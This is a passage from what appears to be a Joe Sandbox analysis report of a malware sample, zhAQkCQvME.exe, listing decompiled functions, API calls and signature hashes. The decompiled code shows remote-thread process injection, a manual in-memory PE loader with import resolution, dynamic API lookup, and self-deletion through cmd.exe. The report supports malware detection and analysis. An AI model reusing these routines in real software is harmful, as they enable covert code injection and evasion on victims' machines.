							_t90 = _t90 + 4;
							_v20 = _t51;
							if(_v20 <= 0) {
								L26:
								_v16 = 0;
								while(_v16 < 0x14) {
									if(DeleteFileW(_v12) == 0) {
										while(0 != 0) {
										}
										SleepEx(0x3e8, 1);
										_v16 = _v16 + 1;
										continue;
									}
									break;
								}
								L34:
								E00403F10( &_v28, 0xfffffffe);
								E00403F10( &_v12, 0xfffffffe);
								E00403F10( &_v24, 0x1000);
								return _v20;
							}
							_v16 = 0;
							while(_v16 < 0xc8) {
								_t61 = E004085A0(_t69, _a8);
								_t90 = _t90 + 4;
								_v32 = _t61;
								if(_v32 == 0) {
									Sleep(0x64);
									_v16 = _v16 + 1;
									continue;
								}
								CloseHandle(_v32);
								Sleep(0x3e8);
								goto L26;
							}
							goto L26;
						}
						_v20 = 0xfffffffe;
						goto L34;
					}
					return _t41 | 0xffffffff;
				}
				while(0 != 0) {
				}
				return _t40 | 0xffffffff;
			}

0x00410510
0x00410516
0x0041051d
0x00410524
0x00410528
0x0041052f
0x00410534
0x00410537
0x0041053e
0x00410552
0x00410557
0x0041055a
0x00410561
0x00410579
0x0041057e
0x00410581
0x00410585
0x00410594
0x0041059a
0x0041059e
0x004105ae
0x004105ba
0x004105bf
0x004105c2
0x004105c6
0x004105cc
0x004105d1
0x004105d4
0x004105db
0x004105e9
0x004105ed
0x004105ef
0x004105f3
0x004105f8
0x004105fb
0x00410602
0x00410655
0x00410655
0x00410667
0x00410679
0x0041067d
0x00410681
0x0041068a
0x00410664
0x00000000
0x00410664
0x00000000
0x0041067b
0x00410692
0x00410698
0x004106a6
0x004106b7
0x00000000
0x004106bf
0x00410604
0x00410616
0x00410623
0x00410628
0x0041062b
0x00410632
0x0041064d
0x00410613
0x00000000
0x00410613
0x00410638
0x00410643
0x00000000
0x00410643
0x00000000
0x00410616
0x004105dd
0x00000000
0x004105dd
0x00000000
0x00410563
0x00410540
0x00410544
0x00000000

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 5eb94525628633ba1024b8a7df56f85849a699de470797a984802700e4f4d6f6
Instruction ID: 973261b8963cdbbbfc3f1ce6e542c723df26fcfa5d6d557a69f9c9865d06a95b
Opcode Fuzzy Hash: 5eb94525628633ba1024b8a7df56f85849a699de470797a984802700e4f4d6f6
Instruction Fuzzy Hash: CE51B8B4D00209EBDB00DFA1D846BEE77746B44308F10852BE516662C1EBBC96D1CF5A

Uniqueness

Uniqueness Score: 0.00%

Function 004069A0, Relevance: 7.6, APIs: 5, Instructions: 95
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E004069A0(void* __eflags, void* __fp0, void* _a4, intOrPtr _a8) {
				void* _v8;
				char _v40;
				_Unknown_base(*)()* _v44;
				void* _v48;
				void* _v52;
				long _v56;

				_v56 = 0;
				_v8 = 0;
				_v44 = 0;
				_v48 = 0;
				E00404820(__eflags,  &_v40, 0x14, 0x1e, 0x4201bc);
				_v8 = E00406460(__fp0, 0, _a4, _a8,  &_v44,  &_v48,  &_v40, 0x41e1b0, 0x540);
				if(_v8 != 0) {
					_v52 = CreateRemoteThread(_a4, 0, 0, _v44, _v48, 0,  &_v56);
					__eflags = _v52;
					if(_v52 != 0) {
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						CloseHandle(_v52);
						return _v8;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						VirtualFreeEx(_a4, _v8, 0, 0x8000);
					}
					__eflags = _v44;
					if(_v44 != 0) {
						VirtualFreeEx(_a4, _v44, 0, 0x8000);
					}
					__eflags = _v48;
					if(_v48 != 0) {
						VirtualFreeEx(_a4, _v48, 0, 0x8000);
					}
					__eflags = 0;
					return 0;
				}
				return 0;
			}

0x004069a6
0x004069ad
0x004069b4
0x004069bb
0x004069cf
0x004069ff
0x00406a06
0x00406a2b
0x00406a2e
0x00406a32
0x00406a3c
0x00406a3c
0x00406a3e
0x00000000
0x00000000
0x00406a40
0x00406a46
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a34
0x00406a34
0x00406a34
0x00406a36
0x00000000
0x00000000
0x00406a38
0x00406a51
0x00406a51
0x00406a53
0x00000000
0x00000000
0x00406a55
0x00406a57
0x00406a5b
0x00406a6c
0x00406a6c
0x00406a72
0x00406a76
0x00406a87
0x00406a87
0x00406a8d
0x00406a91
0x00406aa2
0x00406aa2
0x00406aa8
0x00000000
0x00406aa8
0x00000000

APIs

Part of subcall function 00404820: lstrlenA.KERNEL32(?), ref: 0040486F

CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00406A25
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 00406A6C
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 00406A87
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 00406AA2

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: FreeVirtual$CreateRemoteThreadlstrlen
String ID:
API String ID: 1950991570-0
Opcode ID: 3724245f60b21b742edec5f601781832cb6983edbec3eff57f19c2ebc5439090
Instruction ID: 5eab572b92db7fdbed4a5bb327bb861a79351d0c5b828a283d8c752a5b820506
Opcode Fuzzy Hash: 3724245f60b21b742edec5f601781832cb6983edbec3eff57f19c2ebc5439090
Instruction Fuzzy Hash: 1E313D75B00208FBDB14EBA4DC45FEE77B9AB48704F10C02AF606B62C0D7799A558F68

Uniqueness

Uniqueness Score: 8.94%

Function 0040B590, Relevance: 7.6, APIs: 5, Instructions: 91
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B590(void* __ecx) {
				CHAR* _v8;
				CHAR* _v12;
				struct HINSTANCE__* _v16;
				CHAR* _v20;
				intOrPtr _v24;
				CHAR* _v28;
				CHAR* _v32;

				_v24 = 1;
				_v8 = E00408060(__ecx, 0xb1c);
				_v16 = GetModuleHandleA(_v8);
				_t49 =  &_v8;
				E00408170( &_v8);
				_v20 = E00408060( &_v8, 0x1d5d);
				_v32 = E00408060( &_v8, 0x1e12);
				_v28 = E00408060(_t49, 0x1625);
				_v12 = E00408060(_t49, 0x1552);
				 *0x4216f4 = GetProcAddress(_v16, _v20);
				if( *0x4216f4 != 0) {
					 *0x4216f8 = GetProcAddress(_v16, _v32);
					if( *0x4216f8 != 0) {
						 *0x4216fc = GetProcAddress(_v16, _v28);
						if( *0x4216fc != 0) {
							 *0x421700 = GetProcAddress(_v16, _v12);
							if( *0x421700 == 0) {
								_v24 = 0;
							}
						} else {
							_v24 = 0;
						}
					} else {
						_v24 = 0;
					}
				} else {
					_v24 = 0;
				}
				E00408170( &_v20);
				E00408170( &_v32);
				E00408170( &_v28);
				E00408170( &_v12);
				return _v24;
			}

0x0040b596
0x0040b5aa
0x0040b5b7
0x0040b5ba
0x0040b5be
0x0040b5d3
0x0040b5e3
0x0040b5f3
0x0040b603
0x0040b614
0x0040b620
0x0040b639
0x0040b645
0x0040b65e
0x0040b66a
0x0040b683
0x0040b68f
0x0040b691
0x0040b691
0x0040b66c
0x0040b66c
0x0040b66c
0x0040b647
0x0040b647
0x0040b647
0x0040b622
0x0040b622
0x0040b622
0x0040b69c
0x0040b6a8
0x0040b6b4
0x0040b6c0
0x0040b6ce

APIs

GetModuleHandleA.KERNEL32(0040BDC5), ref: 0040B5B1
GetProcAddress.KERNEL32(?,?), ref: 0040B60E
GetProcAddress.KERNEL32(?,?), ref: 0040B633

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID:
API String ID: 667068680-0
Opcode ID: 1634341ef26aec0072e2be5b5bf0b34f6a5bcd7463ffbb0853a58cbd80db70ed
Instruction ID: 61463e89894d7bd36d213213a0e03026be37f84fa2753205e565d9228cf2b746
Opcode Fuzzy Hash: 1634341ef26aec0072e2be5b5bf0b34f6a5bcd7463ffbb0853a58cbd80db70ed
Instruction Fuzzy Hash: 8F315EF5D00609EFDB00EFE0E945BAE7774AB18308F10443EE516B6291E7795605CB9A

Uniqueness

Uniqueness Score: 0.28%

Function 00404D50, Relevance: 7.6, APIs: 6, Instructions: 76
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00404D50(CHAR* _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				CHAR** _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _t34;
				void* _t48;
				int _t50;

				_v8 =  &_a16;
				_v12 = 0;
				_v16 = 0;
				while( *_v8 != 0) {
					_t50 = lstrlenA( *_v8);
					_v12 = _t50 + lstrlenA(_a4);
					_v8 =  &(_v8[1]);
				}
				if(_a12 != 0) {
					_t48 = _a12 - 1;
					if(_v12 > _t48) {
						while(0 != 0) {
						}
						return _t48;
					}
				}
				_v16 = 0;
				_v8 =  &_a16;
				while(1) {
					_t34 = _v8;
					if( *_t34 == 0) {
						break;
					}
					lstrcpyA(_a8 + _v16,  *_v8);
					_v16 = lstrlenA( *_v8) + _v16;
					_v8 =  &(_v8[1]);
					if( *_v8 != 0) {
						lstrcpyA(_a8 + _v16, _a4);
						_v16 = lstrlenA(_a4) + _v16;
					}
				}
				return _t34;
			}

0x00404d5a
0x00404d5d
0x00404d64
0x00404d6b
0x00404d79
0x00404d8d
0x00404d96
0x00404d96
0x00404d9f
0x00404da4
0x00404daa
0x00404dac
0x00404db0
0x00000000
0x00404dac
0x00404daa
0x00404db4
0x00404dbe
0x00404dc1
0x00404dc1
0x00404dc7
0x00000000
0x00000000
0x00404dd6
0x00404deb
0x00404df4
0x00404dfd
0x00404e0a
0x00404e1d
0x00404e1d
0x00404e20
0x00404e26

APIs

lstrlenA.KERNEL32(?), ref: 00404D79
lstrlenA.KERNEL32(00000000), ref: 00404D85
lstrcpyA.KERNEL32(00000000,?), ref: 00404DD6
lstrlenA.KERNEL32 ref: 00404DE2
lstrcpyA.KERNEL32(00000000,00000000), ref: 00404E0A
lstrlenA.KERNEL32(00000000), ref: 00404E14

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: lstrlen$lstrcpy
String ID:
API String ID: 805584807-0
Opcode ID: 1b82b754d2fadc385b7291b21e4e56e2ceaa788dd3a9aa19b57d5daddb05a7c0
Instruction ID: fb4fd229fef7e7110793ee1294477b57d6dd0fe2a5baf176d79c8942a7a2bce1
Opcode Fuzzy Hash: 1b82b754d2fadc385b7291b21e4e56e2ceaa788dd3a9aa19b57d5daddb05a7c0
Instruction Fuzzy Hash: 0931CAB5900208EFCB14DF98D984BDEBBB5FF88305F1081AAE915A7390D7349A50DF94

Uniqueness

Uniqueness Score: 0.04%

Function 00407230, Relevance: 7.5, APIs: 5, Instructions: 40
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00407230(void* __ecx, long _a4) {
				void* _v8;

				if(OpenThreadToken(GetCurrentThread(), _a4, 0,  &_v8) != 0) {
					L10:
					return _v8;
				}
				if(GetLastError() != 0x3f0) {
					while(0 != 0) {
					}
					return 0;
				}
				if(OpenProcessToken(GetCurrentProcess(), _a4,  &_v8) != 0) {
					goto L10;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x0040724d
0x0040728b
0x00000000
0x0040728b
0x0040725a
0x00407281
0x00407285
0x00000000
0x00407287
0x00407273
0x00000000
0x0040727f
0x00407275
0x00407279
0x00000000

APIs

GetCurrentThread.KERNEL32(00407583,00000000,00000008,?,?,00407583,00000008), ref: 0040723E
OpenThreadToken.ADVAPI32(00000000,?,?,00407583,00000008), ref: 00407245
GetLastError.KERNEL32(?,?,00407583,00000008), ref: 0040724F
GetCurrentProcess.KERNEL32(00407583,00000008,?,?,00407583,00000008), ref: 00407264
OpenProcessToken.ADVAPI32(00000000,?,?,00407583,00000008), ref: 0040726B

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken$ErrorLast
String ID:
API String ID: 102224034-0
Opcode ID: 6d90dd5dd26aac63bf4e686c17e0bf44905bef8aa382f84acef9230899ea7941
Instruction ID: a2e205466a71b31de6cbfab1ba58a1fcd7169059afbc2813f5d1bb4f2037eb5b
Opcode Fuzzy Hash: 6d90dd5dd26aac63bf4e686c17e0bf44905bef8aa382f84acef9230899ea7941
Instruction Fuzzy Hash: C3F04471E09104EBCB90DBF0DD44EEB376CAB48340B2045BEFD06E5590D63DEA01969B

Uniqueness

Uniqueness Score: 0.81%

Function 00410460, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00404CB0: lstrlenW.KERNEL32(0041E1A0), ref: 00404CD8

CoInitializeEx.OLE32(00000000,00000006), ref: 00410493
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004104BC

Strings

, xrefs: 004104C5
open, xrefs: 004104B5

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: ExecuteInitializeShelllstrlen
String ID: $open
API String ID: 1602038812-119239145
Opcode ID: 02246e20dbf1147b5cf1a5e2bf38867122130e6e5bf074f9d77bf8a354d4f754
Instruction ID: 87fe3c75867259940be6548c21eaf75d92f8f2243542085ee2ceb97212c0f6f5
Opcode Fuzzy Hash: 02246e20dbf1147b5cf1a5e2bf38867122130e6e5bf074f9d77bf8a354d4f754
Instruction Fuzzy Hash: 6C11ECB5D40308FBDB10DFD0DC46BDE7774AB44704F1081AAF611762C0D6B85A808B8A

Uniqueness

Uniqueness Score: 6.12%

Function 0040EE20, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46
UNIQUE

Download Yara Rule

C-Code - Quality: 30%

			E0040EE20() {
				short _v516;
				char _v520;
				signed int _t6;
				signed int _t7;
				signed int _t16;

				_t6 =  *0x421408; // 0x0
				_t7 = _t6 & 0x00000001;
				if(_t7 != 0) {
					L2:
					while(0 != 0) {
					}
					return _t7 | 0xffffffff;
				}
				_t16 =  *0x421408; // 0x0
				_t17 = _t16 & 0x00000010;
				if((_t16 & 0x00000010) == 0) {
					_v520 = E00407F40(_t17, 0x1fc7);
					_push("C:\Users\Luke\Desktop\zhAQkCQvME.exe");
					E00403B30( &_v516, 0x200, _v520, "C:\Windows");
					while(0 != 0) {
					}
					E00408170( &_v520);
					ShellExecuteW(0, 0, L"cmd.exe",  &_v516, 0, 0);
					return 0;
				}
				goto L2;
			}

0x0040ee29
0x0040ee2e
0x0040ee31
0x00000000
0x0040ee3e
0x0040ee42
0x00000000
0x0040ee44
0x0040ee33
0x0040ee39
0x0040ee3c
0x0040ee56
0x0040ee5c
0x0040ee79
0x0040ee81
0x0040ee85
0x0040ee8e
0x0040eeaa
0x00000000
0x0040eeb0
0x00000000

APIs

ShellExecuteW.SHELL32(00000000,00000000,cmd.exe,?,00000000,00000000), ref: 0040EEAA

Strings

C:\Users\user\Desktop\zhAQkCQvME.exe, xrefs: 0040EE5C
cmd.exe, xrefs: 0040EEA1
C:\Windows, xrefs: 0040EE61

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\Desktop\zhAQkCQvME.exe$C:\Windows$cmd.exe
API String ID: 587946157-3418617114
Opcode ID: b0ba5c90c6993c31a4e2f19c7ef810cd21d1cf3f6689f59b440004575ebc7c5f
Instruction ID: 5d4a17676602ed8f4bebe64d0db879ee30816e53a16cb61688f90dc5c0d2cf16
Opcode Fuzzy Hash: b0ba5c90c6993c31a4e2f19c7ef810cd21d1cf3f6689f59b440004575ebc7c5f
Instruction Fuzzy Hash: 1B017BB0F4030867E720F322DD07F7632249B10304F5845BBF619B61C3E9786922CA9E

Uniqueness

Uniqueness Score: 100.00%

Function 0040FBA9, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
stringfileUNIQUE

Download Yara Rule

C-Code - Quality: 37%

			E0040FBA9() {
				void* _t30;

				while(0 != 0) {
				}
				 *((intOrPtr*)(_t30 - 4)) = 0xffffffff;
				lstrcpynW(_t30 - 0x8b8, "C:\Users\Luke\Desktop\zhAQkCQvME.exe", 0x104);
				 *(_t30 - 0x6ac) = E00407F40(_t30 - 0x8b8, 0x5bf);
				lstrcatW(_t30 - 0x8b8,  *(_t30 - 0x6ac));
				E00408170(_t30 - 0x6ac);
				if(E0040E080(_t30 - 0x6ac, _t30 - 0x8b8) != 0) {
					DeleteFileW(_t30 - 0x8b8);
				}
				E0040EE20();
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0x10));
				return 0;
			}

0x0040fbac
0x0040fbb0
0x0040fbb2
0x0040fbca
0x0040fbdd
0x0040fbf1
0x0040fbfe
0x0040fc17
0x0040fc20
0x0040fc20
0x0040fc26
0x0040fc30
0x0040fc3d

APIs

lstrcpynW.KERNEL32(?,C:\Users\user\Desktop\zhAQkCQvME.exe,00000104), ref: 0040FBCA
lstrcatW.KERNEL32(?,?), ref: 0040FBF1
DeleteFileW.KERNEL32(?), ref: 0040FC20

Strings

C:\Users\user\Desktop\zhAQkCQvME.exe, xrefs: 0040FBBE

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: DeleteFilelstrcatlstrcpyn
String ID: C:\Users\user\Desktop\zhAQkCQvME.exe
API String ID: 3673347326-286999786
Opcode ID: b5305184a9db6b284abed23113527131ddab73f17061cbb82d73fd087007b943
Instruction ID: da7d90b85580019ad27e519eab8996905fa281c703f1f135ef0a02fa165ee054
Opcode Fuzzy Hash: b5305184a9db6b284abed23113527131ddab73f17061cbb82d73fd087007b943
Instruction Fuzzy Hash: C60188F2D00219DBDB60EBA1DC41BDA7774EB48314F0086FAE559A21C0EF35A698CF95

Uniqueness

Uniqueness Score: 100.00%

Function 00406BB0, Relevance: 6.2, APIs: 4, Instructions: 208
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00406BB0(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed short* _v24;
				intOrPtr _v28;
				signed short* _v32;
				intOrPtr _v36;
				unsigned int _v40;
				unsigned int _v44;
				intOrPtr* _v48;
				signed short _v52;
				signed int _v53;
				intOrPtr _v60;
				signed int _v64;
				signed int* _v68;
				struct HINSTANCE__* _v72;
				intOrPtr* _v76;
				intOrPtr _v80;
				_Unknown_base(*)()* _v84;
				intOrPtr _t172;

				_v8 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v16 = _v8;
				_t172 = _a4 -  *((intOrPtr*)(_v16 + 0x34));
				_v12 = _t172;
				if(_t172 == 0) {
					L13:
					while(0 != 0) {
					}
					if( *((intOrPtr*)(_v16 + 0x80)) == 0) {
						L35:
						_v20 =  *((intOrPtr*)(_v16 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v20;
						}
						 *((intOrPtr*)(_v16 + 0x34)) = _a4;
						return _v20(_a4, 1, _a8);
					}
					_v64 = 0x80000000;
					_v76 = _a4 +  *((intOrPtr*)(_v16 + 0x80));
					while( *((intOrPtr*)(_v76 + 0xc)) != 0) {
						_v72 = GetModuleHandleA( *((intOrPtr*)(_v76 + 0xc)) + _a4);
						if(_v72 == 0) {
							_v72 = LoadLibraryA( *((intOrPtr*)(_v76 + 0xc)) + _a4);
						}
						if(_v72 != 0) {
							if( *_v76 == 0) {
								_v68 =  *((intOrPtr*)(_v76 + 0x10)) + _a4;
							} else {
								_v68 =  *_v76 + _a4;
							}
							_v60 = 0;
							while( *_v68 != 0) {
								if(( *_v68 & _v64) == 0) {
									_v80 =  *_v68 + _a4;
									_v84 = GetProcAddress(_v72, _v80 + 2);
								} else {
									_v84 = GetProcAddress(_v72,  *_v68 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v76 + 0x10)) == 0) {
									 *_v68 = _v84;
								} else {
									 *( *((intOrPtr*)(_v76 + 0x10)) + _a4 + _v60) = _v84;
								}
								_v68 =  &(_v68[1]);
								_v60 = _v60 + 4;
							}
							_v76 = _v76 + 0x14;
							continue;
						} else {
							return 0xfffffffd;
						}
					}
					goto L35;
				}
				_v24 = _a4 +  *((intOrPtr*)(_v16 + 0xa0));
				_v28 =  *((intOrPtr*)(_v16 + 0xa4));
				while(0 != 0) {
				}
				while(_v28 > 0) {
					_v40 = _v24[2];
					_v28 = _v28 - _v40;
					_v40 = _v40 - 8;
					_v40 = _v40 >> 1;
					_v32 =  &(_v24[4]);
					_v36 = _a4 +  *_v24;
					_v44 = _v40;
					while(1) {
						_v44 = _v44 - 1;
						if(_v44 == 0) {
							break;
						}
						_v53 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v52 =  *_v32 & 0xfff;
						_v48 = (_v52 & 0x0000ffff) + _v36;
						if((_v53 & 0x000000ff) != 3) {
							if((_v53 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v12;
							}
						} else {
							 *_v48 =  *_v48 + _v12;
						}
						_v32 =  &(_v32[1]);
					}
					_v24 = _v32;
				}
				goto L13;
			}

0x00406bbf
0x00406bc5
0x00406bce
0x00406bd1
0x00406bd4
0x00000000
0x00406cbb
0x00406cbf
0x00406ccb
0x00406ded
0x00406df6
0x00406df9
0x00406dfd
0x00406e03
0x00406e0b
0x00406e0b
0x00406e13
0x00000000
0x00406e20
0x00406cd1
0x00406ce4
0x00406ce7
0x00406d04
0x00406d0b
0x00406d1d
0x00406d1d
0x00406d24
0x00406d36
0x00406d4e
0x00406d38
0x00406d40
0x00406d40
0x00406d51
0x00406d58
0x00406d68
0x00406d8c
0x00406da0
0x00406d6a
0x00406d7f
0x00406d7f
0x00406daa
0x00406dc6
0x00406dac
0x00406dbb
0x00406dbb
0x00406dce
0x00406dd7
0x00406dd7
0x00406de5
0x00000000
0x00406d26
0x00000000
0x00406d26
0x00406d24
0x00000000
0x00406ce7
0x00406be6
0x00406bf2
0x00406bf5
0x00406bf9
0x00406bfb
0x00406c0b
0x00406c14
0x00406c1d
0x00406c25
0x00406c2e
0x00406c39
0x00406c3f
0x00406c42
0x00406c4b
0x00406c50
0x00000000
0x00000000
0x00406c5b
0x00406c69
0x00406c74
0x00406c7e
0x00406c96
0x00406ca3
0x00406ca3
0x00406c80
0x00406c8b
0x00406c8b
0x00406cab
0x00406cab
0x00406cb3
0x00406cb3
0x00000000

APIs

GetModuleHandleA.KERNEL32(?), ref: 00406CFE
LoadLibraryA.KERNEL32(?), ref: 00406D17
GetProcAddress.KERNEL32(00000000,?), ref: 00406D79
GetProcAddress.KERNEL32(00000000,?), ref: 00406D9A

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 7111c8e45a64473d8a2582fa8ed3ac34885a3a50cc8e9dca8b9e50200673eae9
Instruction ID: c8f5d80ef062aba3ebd1779de3a3355560fc4e24e5523b2c336175c5a7cd68a8
Opcode Fuzzy Hash: 7111c8e45a64473d8a2582fa8ed3ac34885a3a50cc8e9dca8b9e50200673eae9
Instruction Fuzzy Hash: F3A18674E04209DFCB14CF98C490AADBBB1FF88314F25856AD816BB395C734A952CF94

Uniqueness

Uniqueness Score: 0.99%

Function 00410D80, Relevance: 6.1, APIs: 4, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00410D80(void* __ecx) {
				struct HINSTANCE__* _v8;
				char _v12;
				intOrPtr _v16;
				_Unknown_base(*)()* _v20;
				struct HINSTANCE__* _v24;
				intOrPtr _t21;
				CHAR* _t22;
				intOrPtr _t32;
				CHAR* _t38;
				intOrPtr _t39;
				intOrPtr _t41;
				void* _t42;
				void* _t43;

				_t36 = __ecx;
				_v24 = 0;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				_t21 = E00403EE0(__ecx, 0x100);
				_t43 = _t42 + 4;
				 *0x41f71c = _t21;
				_t22 =  *0x421860; // 0x15d0d5a
				_v8 = LoadLibraryA(_t22);
				if(_v8 != 0) {
					_t38 =  *0x4217f4; // 0x15d0807
					_v20 = GetProcAddress(_v8, _t38);
					if(_v20 != 0) {
						_t39 =  *0x41f71c; // 0x0
						E00404120(_t36, _t39, 0, 0x100);
						_t43 = _t43 + 0xc;
						_v12 = 0xff;
						_t37 =  *0x41f71c; // 0x0
						_v16 = _v20(0, _t37,  &_v12);
						if(_v16 == 0) {
							FreeLibrary(_v8);
							return 0;
						}
						while(0 != 0) {
						}
						_v24 = 0xfffffffd;
						L13:
						if(_v8 != 0) {
							_t37 = _v8;
							FreeLibrary(_v8);
						}
						_t41 =  *0x421734; // 0x15d05bc
						_t32 =  *0x41f71c; // 0x0
						E00403BF0(_t37, _t32, _t41, 0x100);
						return 0xfffffffe;
					} else {
						goto L5;
					}
					while(1) {
						L5:
						_t37 = 0;
						if(0 == 0) {
							break;
						}
					}
					_v24 = 0xfffffffe;
					goto L13;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t37 = 0;
					if(0 == 0) {
						break;
					}
				}
				_v24 = 0xffffffff;
				goto L13;
			}

0x00410d80
0x00410d86
0x00410d8d
0x00410d94
0x00410d9b
0x00410da7
0x00410dac
0x00410daf
0x00410db4
0x00410dc0
0x00410dc7
0x00410dd8
0x00410de9
0x00410df0
0x00410e08
0x00410e0f
0x00410e14
0x00410e17
0x00410e22
0x00410e2e
0x00410e35
0x00410e4a
0x00000000
0x00410e50
